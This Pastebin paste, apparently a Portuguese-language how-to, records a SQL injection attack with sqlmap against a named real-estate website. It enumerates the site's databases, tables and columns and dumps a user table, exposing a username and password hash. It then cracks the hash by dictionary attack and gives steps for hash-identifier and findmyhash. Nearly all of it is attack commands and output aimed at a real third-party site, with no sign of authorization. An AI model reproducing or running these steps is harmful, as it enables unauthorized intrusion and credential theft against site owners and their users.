Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 -f -b --current-user --current-db --dbs --is-dba
- [11:29:15] [INFO] fetching database names
- [11:29:15] [INFO] the SQL query used returns 2 entries
- [11:29:15] [INFO] resumed: "information_schema"
- [11:29:15] [INFO] resumed: "invista_invista"
- available databases [2]:
- [*] information_schema
- [*] invista_invista
- python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --tables -D invista_invista Database: invista_invista
- back-end DBMS: MySQL 5
- [11:34:09] [INFO] fetching tables for database: 'invista_invista'
- [11:34:09] [INFO] the SQL query used returns 10 entries
- [11:34:09] [INFO] resumed: "banners"
- [11:34:09] [INFO] resumed: "bannersfesta"
- [11:34:09] [INFO] resumed: "imoveis_bairro"
- [11:34:09] [INFO] resumed: "imoveis_descricao"
- [11:34:09] [INFO] resumed: "imoveis_finalidade"
- [11:34:09] [INFO] resumed: "imoveis_fotos"
- [11:34:09] [INFO] resumed: "imoveis_tipo"
- [11:34:09] [INFO] resumed: "newsletter"
- [11:34:09] [INFO] resumed: "noticias"
- [11:34:09] [INFO] resumed: "usuario"
- Database: invista_invista
- [10 tables]
- +--------------------+
- <PIPE> banners <PIPE>
- <PIPE> bannersfesta <PIPE>
- <PIPE> imoveis_bairro <PIPE>
- <PIPE> imoveis_descricao <PIPE>
- <PIPE> imoveis_finalidade <PIPE>
- <PIPE> imoveis_fotos <PIPE>
- <PIPE> imoveis_tipo <PIPE>
- <PIPE> newsletter <PIPE>
- <PIPE> noticias <PIPE>
- <PIPE> usuario <PIPE>
- +--------------------+
- python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario
- [11:37:33] [INFO] the SQL query used returns 2 entries
- [11:37:33] [INFO] resumed: "u2_usuario","varchar(255)"
- [11:37:33] [INFO] resumed: "u3_senha","varchar(255)"
- Database: invista_invista
- Table: usuario
- [2 columns]
- +------------+--------------+
- <PIPE> Column <PIPE> Type <PIPE>
- +------------+--------------+
- <PIPE> u2_usuario <PIPE> varchar(255) <PIPE>
- <PIPE> u3_senha <PIPE> varchar(255) <PIPE>
- +------------+--------------+
- python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario -C u2_usuario,u3_senha Database : invista_invista
- web application technology: PHP 5.2.17
- back-end DBMS: MySQL 5
- do you want sqlmap to consider provided column(s):
- [1] as LIKE column names (default) <--- aceite
- fase aceita dicionario sqlmap
- [2] as exact column names
- [11:42:38] [INFO] fetching columns like 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
- [11:42:38] [INFO] the SQL query used returns 2 entries
- [11:42:38] [INFO] resumed: "u2_usuario","varchar(255)"
- [11:42:38] [INFO] resumed: "u3_senha","varchar(255)"
- [11:42:39] [INFO] fetching entries of column(s) 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
- [11:42:39] [INFO] the SQL query used returns 1 entries
- [11:42:40] [WARNING] reflective value(s) found and filtering out
- [11:42:40] [INFO] retrieved: "invista","*1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24"
- [11:42:41] [INFO] analyzing table dump for possible password hashes
- recognized possible password hashes in column 'u3_senha'. Do you want to crack them via a dictionary-based attack? [Y/n/q] <---yes
- what dictionary do you want to use?
- [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter) <---aceita
- [2] custom dictionary file
- [3] file with list of dictionary files
- [11:44:09] [INFO] using default dictionary
- [11:44:09] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
- do you want to use common password suffixes? (slow!) [y/N] <--- sim
- [11:44:39] [INFO] starting dictionary-based cracking (mysql_passwd)
- [11:44:39] [INFO] starting 2 processes
- [11:45:09] [INFO] using suffix '12' passa varias vezes (normal)
- atabase: invista_invista
- Table: usuario
- [1 entry]
- +-------------------------------------------+------------+
- <PIPE> u3_senha <PIPE> u2_usuario <PIPE>
- +-------------------------------------------+------------+
- <PIPE> *1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <PIPE> invista <PIPE>
- +-------------------------------------------+------------+
- senhans quase sempre em md5
- Para identificar usaremos o hash-identifier :
- /pentest/passwords/hash-identifier#
- /pentest/passwords/hash-identifier#./hash_id.py
- #########################################################################
- # __ __ __ ______ _____ #
- # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
- # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
- # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
- # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
- # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
- # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 #
- # By Zion3R #
- # www.Blackploit.com #
- # Root@Blackploit.com #
- #########################################################################
- -------------------------------------------------------------------------
- HASH: 1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <-- cole a senha aqui
- SE NÃO ACHAR USE ESSE PROGRAMA AQUI PRA VER SE QUEBRA
- https://code.google.com/p/findmyhash/downloads/detail?name=findmyhash_v1.1.2.py
- ASSIM
- cd Descktop
- Desktop#python findmyhash_v1.1.2.py -MD5 -h 1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24
- se aparecer que ele ta rachada contegiu
- obs:apos baixar o programa clic no botão direito do mouse e escolha propiedades e escolha permisão
- a ultima opção executar como programa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement